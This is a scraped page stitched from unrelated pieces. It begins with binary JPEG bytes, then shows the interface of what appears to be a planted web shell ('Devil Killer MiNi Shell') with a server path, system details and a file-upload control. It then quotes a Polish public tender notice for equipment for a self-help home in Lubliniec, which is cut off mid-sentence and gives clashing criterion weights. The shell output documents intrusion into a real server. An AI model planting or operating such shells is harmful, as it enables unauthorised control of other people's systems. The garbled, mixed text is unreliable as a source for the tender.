JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230929/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20230929/0042105701-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa wyposażenia na potrzeby powiatowego Środowiskowego Domu Samopomocy w Lublińcu przy ulicy E. Cyrana 10 </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiat Lubliniecki</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 152180843</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Paderewskiego 7</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Lubliniec</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">42-700</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">śląskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL228 - Bytomski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">34 35 10 500</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia-publiczne@lubliniec.starostwo.gov.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://www.lubliniec.starostwo.gov.pl/kontakt.html</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa wyposażenia na potrzeby powiatowego Środowiskowego Domu Samopomocy w Lublińcu przy ulicy E. Cyrana 10 </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-e4936300-5dfc-11ee-a60c-9ec5599dddc1</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00421057</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-09-29</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00020084/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.4 Dostawa wyposażenia na potrzeby powiatowego Środowiskowego Domu Samopomocy w Lublińcu przy ul. E. Cyrana 10</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pzlubliniec.e-zp.finn.pl/procurements <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://pzlubliniec.e-zp.finn.pl/procurements</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1)	W postępowaniu o udzielenie zamówienia komunikacja pomiędzy zamawiającym a wykonawcą odbywa się przy użyciu środków komunikacji elektronicznej – Systemu FINN e-Zamówienia Publiczne Powiatu Lublinieckiego, dostępnego pod adresem: https://pzlubliniec.e-zp.finn.pl/.<br/>2)	Szczegółowe informacje dotyczące przyjętego w postępowaniu sposobu komunikacji, znajdują się w rozdziale III podrozdziale 1 niniejszej SWZ. Instrukcja korzystania z systemu: https://pomoc.e-zp.finn.pl/.<br/>3)	Uwaga! Przed przystąpieniem do składania oferty, wykonawca jest zobowiązany zapoznać się z Instrukcją obsługi Systemu FINN e-Zamówienia Publiczne Powiatu Lublinieckiego.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z postanowieniami SWZ</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Zgodnie z postanowieniami SWZ</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">RZP.272.17.2023</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">5</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest dostawa wyposażenia na potrzeby powiatowego Środowiskowego Domu Samopomocy w Lublińcu przy ulicy E. Cyrana 10, realizowana w ramach zadania:<br/><br/>ZADANIE NR I - WYPOSAŻENIE POMIESZCZEŃ BIUROWYCH W SPRZĘT<br/><br/>2)	Szczegółowy opis i zakres przedmiotu zamówienia (dla ZADANIA NR I) określa załącznik nr 2 do SWZ.<br/><br/>3)	Zaoferowany przez wykonawcę sprzęt, który wymaga podłączenia do instalacji elektrycznej lub sanitarnej powinien być zgodny z zaprojektowaną w powiatowym Środowiskowym Domu Samopomocy instalacją elektryczną i sanitarną udostępnioną w załącznikach:<br/>a)	Projekt techniczny instalacji elektrycznej – załącznik nr 7 do SWZ<br/>b)	Projekt techniczny instalacji sanitarnej – załącznik nr 8 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">30213300-8 - Komputer biurkowy</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">30200000-1 - Urządzenia komputerowe</p> <p class="mb-0">30213100-6 - Komputery przenośne</p> <p class="mb-0">42962000-7 - Urządzenia drukujące i graficzne</p> <p class="mb-0">32322000-6 - Urządzenia multimedialne</p> <p class="mb-0">32320000-2 - Sprzęt telewizyjny i audiowizualny</p> <p class="mb-0">38652000-0 - Projektory filmowe</p> <p class="mb-0">38653400-1 - Ekrany projekcyjne</p> <p class="mb-0">32324300-3 - Urządzenia telewizyjne</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-06</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">DLA ZADANIA NR I, ZADANIA NR II, ZADANIA NR III, ZADANIA NR IV, ZADANIA NR V<br/><br/>Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>Lp.	Opis kryterium oceny	Waga (%)<br/><br/>1) Cena (P1)	60 %<br/><br/>2)	Okres gwarancji (P2)	40 %<br/>	<br/>Razem (P)	100%<br/><br/>Oferty będą oceniane metodą punktową w skali 100-punktowej. <br/><br/>Ad.1) Sposób obliczania punktów dla kryterium wymienionego w pkt „1) Cena” – (P1)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 60,00 pkt.<br/><br/>Waga - 60%<br/><br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/><br/><br/> Najniższa cena spośród ofert nieodrzuconych (brutto)<br/>Wartość punktowa = --------------------------------------------- x 100 pkt x waga <br/> Cena badanej oferty (brutto) <br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbą punktów (100 pkt). Pozostałym wykonawcom, przypisana zostanie proporcjonalnie mniejsza liczba punktów (zgodnie z przedstawionym powyżej sposobem obliczania punktów).<br/><br/>Ad.2) Sposób obliczania punktów dla kryterium wymienionego w pkt „2) Okres gwarancji” – (P2)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 40,00 pkt.<br/>Waga - 40%<br/><br/>Zamawiający ustala minimalny 24-miesięczny okres gwarancji.<br/> <br/>Dla kryterium ,, Okres gwarancji” (odpowiednio dla ZADANIA NR I, ZADANIA NR II, ZADANIA NR III, ZADANIA NR IV, ZADANIA NR V) punkty zostaną przyznane w następujący sposób:<br/>a)	wykonawca, który pozostanie przy minimalnym 24-miesięcznym okresie gwarancji otrzyma 0 pkt.<br/>b)	wykonawca, który pozostanie przy minimalnym 30-miesięcznym okresie gwarancji otrzyma 20 pkt.<br/>c)	wykonawca, który zadeklaruje 36-miesięczny okres gwarancji otrzyma 40 pkt.<br/><br/>Kryterium „Okres gwarancji”, będzie rozpatrywany na podstawie oświadczenia wykonawcy złożonego w pkt 8.1 Formularza ofertowego (odpowiednio dla ZADANIA NR I, ZADANIA NR II, ZADANIA NR III, <br/>ZADANIA NR IV, ZADANIA NR V).<br/><br/>UWAGA:<br/>Brak wskazania w ofercie jakiegokolwiek okresu gwarancji, wskazanie innego okres gwarancji niż 24, 30 lub 36 miesięcy, uznane zostanie przez zamawiającego jako zaoferowanie przez wykonawcę minimalnego okresu gwarancji, tj. 24-miesięcy.<br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/><br/>P = wartość punktowa (Cena – P1) + wartość punktowa (Okres gwarancji – P2)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1) Przedmiotem zamówienia jest dostawa wyposażenia na potrzeby powiatowego Środowiskowego Domu Samopomocy w Lublińcu przy ulicy E. Cyrana 10, realizowana w ramach zadania:<br/><br/>ZADANIE NR II - WYPOSAŻENIE POMIESZCZEŃ BIUROWYCH ORAZ SAL<br/><br/>2) Szczegółowy opis i zakres przedmiotu zamówienia (dla ZADANIA NR II) określa załącznik nr 2 do SWZ.<br/><br/>3) Zaoferowany przez wykonawcę sprzęt, który wymaga podłączenia do instalacji elektrycznej lub sanitarnej powinien być zgodny z zaprojektowaną w powiatowym Środowiskowym Domu Samopomocy instalacją elektryczną i sanitarną udostępnioną w załącznikach:<br/>a) Projekt techniczny instalacji elektrycznej – załącznik nr 7 do SWZ<br/>b) Projekt techniczny instalacji sanitarnej – załącznik nr 8 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">39000000-2 - Meble (włącznie z biurowymi), wyposażenie, urządzenia domowe (z wyłączeniem oświetlenia) i środki czyszczące</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">44421000-7 - Zbrojone lub wzmocnione szafy, kasy i drzwi</p> <p class="mb-0">39113100-8 - Fotele</p> <p class="mb-0">39112000-0 - Krzesła</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-06</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">DLA ZADANIA NR I, ZADANIA NR II, ZADANIA NR III, ZADANIA NR IV, ZADANIA NR V<br/><br/>Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>Lp.	Opis kryterium oceny	Waga (%)<br/><br/>1) Cena (P1)	60 %<br/><br/>2)	Okres gwarancji (P2)	40 %<br/>	<br/>Razem (P)	100%<br/><br/>Oferty będą oceniane metodą punktową w skali 100-punktowej. <br/><br/>Ad.1) Sposób obliczania punktów dla kryterium wymienionego w pkt „1) Cena” – (P1)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 60,00 pkt.<br/><br/>Waga - 60%<br/><br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/><br/><br/> Najniższa cena spośród ofert nieodrzuconych (brutto)<br/>Wartość punktowa = ---------------------------------------------- x 100 pkt x waga <br/> Cena badanej oferty (brutto) <br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbą punktów (100 pkt). Pozostałym wykonawcom, przypisana zostanie proporcjonalnie mniejsza liczba punktów (zgodnie z przedstawionym powyżej sposobem obliczania punktów).<br/><br/>Ad.2) Sposób obliczania punktów dla kryterium wymienionego w pkt „2) Okres gwarancji” – (P2)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 40,00 pkt.<br/>Waga - 40%<br/><br/>Zamawiający ustala minimalny 24-miesięczny okres gwarancji.<br/> <br/>Dla kryterium ,, Okres gwarancji” (odpowiednio dla ZADANIA NR I, ZADANIA NR II, ZADANIA NR III, ZADANIA NR IV, ZADANIA NR V) punkty zostaną przyznane w następujący sposób:<br/>a)	wykonawca, który pozostanie przy minimalnym 24-miesięcznym okresie gwarancji otrzyma 0 pkt.<br/>b)	wykonawca, który pozostanie przy minimalnym 30-miesięcznym okresie gwarancji otrzyma 20 pkt.<br/>c)	wykonawca, który zadeklaruje 36-miesięczny okres gwarancji otrzyma 40 pkt.<br/><br/>Kryterium „Okres gwarancji”, będzie rozpatrywany na podstawie oświadczenia wykonawcy złożonego w pkt 8.1 Formularza ofertowego (odpowiednio dla ZADANIA NR I, ZADANIA NR II, ZADANIA NR III, <br/>ZADANIA NR IV, ZADANIA NR V).<br/><br/>UWAGA:<br/>Brak wskazania w ofercie jakiegokolwiek okresu gwarancji, wskazanie innego okres gwarancji niż 24, 30 lub 36 miesięcy, uznane zostanie przez zamawiającego jako zaoferowanie przez wykonawcę minimalnego okresu gwarancji, tj. 24-miesięcy.<br/><br/>Łączna wartość punktowa zostanie obliczona poprzez zsumowanie wartości:<br/><br/>P = wartość punktowa (Cena – P1) + wartość punktowa (Okres gwarancji – P2)</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1)	Przedmiotem zamówienia jest dostawa wyposażenia na potrzeby powiatowego Środowiskowego Domu Samopomocy w Lublińcu przy ulicy E. Cyrana 10, realizowana w ramach zadania:<br/><br/>ZADANIE NR III - WYPOSAŻENIE POMIESZCZEŃ W SPRZĘT REHABILITACYJNO-USPRAWNIAJĄCY<br/><br/>2)	Szczegółowy opis i zakres przedmiotu zamówienia (dla ZADANIA NR III) określa załącznik nr 2 do SWZ.<br/><br/>3)	Zaoferowany przez wykonawcę sprzęt, który wymaga podłączenia do instalacji elektrycznej lub sanitarnej powinien być zgodny z zaprojektowaną w powiatowym Środowiskowym Domu Samopomocy instalacją elektryczną i sanitarną udostępnioną w załącznikach:<br/>a)	Projekt techniczny instalacji elektrycznej – załącznik nr 7 do SWZ<br/>b)	Projekt techniczny instalacji sanitarnej – załącznik nr 8 do SWZ. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">37440000-4 - Sprzęt do ćwiczeń fizycznych</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">33155000-1 - Przyrządy do fizykoterapii</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2023-12-06</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">DLA ZADANIA NR I, ZADANIA NR II, ZADANIA NR III, ZADANIA NR IV, ZADANIA NR V<br/><br/>Przy wyborze najkorzystniejszej oferty zamawiający będzie kierował się następującymi kryteriami i odpowiadającymi im znaczeniami oraz w następujący sposób będzie oceniał spełnienie kryteriów:<br/><br/>Lp.	Opis kryterium oceny	Waga (%)<br/><br/>1) Cena (P1)	60 %<br/><br/>2)	Okres gwarancji (P2)	40 %<br/>	<br/>Razem (P)	100%<br/><br/>Oferty będą oceniane metodą punktową w skali 100-punktowej. <br/><br/>Ad.1) Sposób obliczania punktów dla kryterium wymienionego w pkt „1) Cena” – (P1)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 60,00 pkt.<br/><br/>Waga - 60%<br/><br/>Ocena ofert w tym kryterium zostanie przeprowadzona w oparciu o poniższy wzór:<br/><br/><br/> Najniższa cena spośród ofert nieodrzuconych (brutto)<br/>Wartość punktowa =----------------------------------------------- x 100 pkt x waga <br/> Cena badanej oferty (brutto) <br/><br/>Oferta z najniższą ceną otrzyma maksymalną liczbą punktów (100 pkt). Pozostałym wykonawcom, przypisana zostanie proporcjonalnie mniejsza liczba punktów (zgodnie z przedstawionym powyżej sposobem obliczania punktów).<br/><br/>Ad.2) Sposób obliczania punktów dla kryterium wymienionego w pkt „2) Okres gwarancji” – (P2)<br/><br/>Maksymalna liczba punktów możliwa do przydzielenia w toku oceny w obrębie danego kryterium wynosi 40,00 pkt.<br/>Waga - 40%<br/><br/>Zamawiający ustala minimalny 24-miesięczny okres gwarancji.<br/> <br/>Dla kryterium ,, Okres gwarancji” (odpowiednio dla ZADANIA NR I, ZADANIA NR II, ZADANIA NR III, ZADANIA NR IV, ZADANIA NR V) punkty zostaną przyznane w następujący sposób:<br/>a)	wykonawca, który pozostanie przy minimalnym 24-miesięcznym okresie gwarancji otrzyma 0 